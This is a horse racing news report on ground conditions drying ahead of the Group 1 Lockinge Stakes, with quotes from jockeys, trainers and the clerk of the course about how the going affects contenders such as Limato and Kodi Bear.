FEARS that the Al Shaqab Lockinge Stakes could be run on extremely testing ground are easing all the time after the ground dried on Friday in advance of the course’s major Flat prize.

During Friday’s card, James Doyle reported the ground to be “dead” and Dane O’Neill used the word “gluey”, but Jamie Spencer predicted racing on Saturday could take place on ground not far off good if the weather is helpful.

The soft, heavy in places quoted in the middle of the week after 50mm hit the track in around 48 hours has already had an effect.

Quicker the better for Limato

Limato’s participation in the Group 1 Lockinge relies on conditions having dried out to connections’ satisfaction, and he was deposed as favourite on Thursday.

The drying ground has improved trainer Henry Candy’s outlook. “I’ll walk the track with the owner at around lunchtime,” he said. “He will probably take his chance on good to soft, although it won’t suit him.”

Kodi Bear and Toormore are vying for favouritism. The former’s last win came on soft ground in the Group 2 Celebration Mile at Goodwood and trainer Clive Cox said he was “relaxed” at the prospect of more testing conditions.

Outsider Gabrial was second that day and trainer Richard Fahey said: “I’m hoping the ground will suit him and not the others.”

The forecast on Saturday is for a dry, sunny day. Clerk of the course Richard Osgood said: “It is drying nicely and I think come the morning we will be good to soft. What happens after that depends on the weather.”
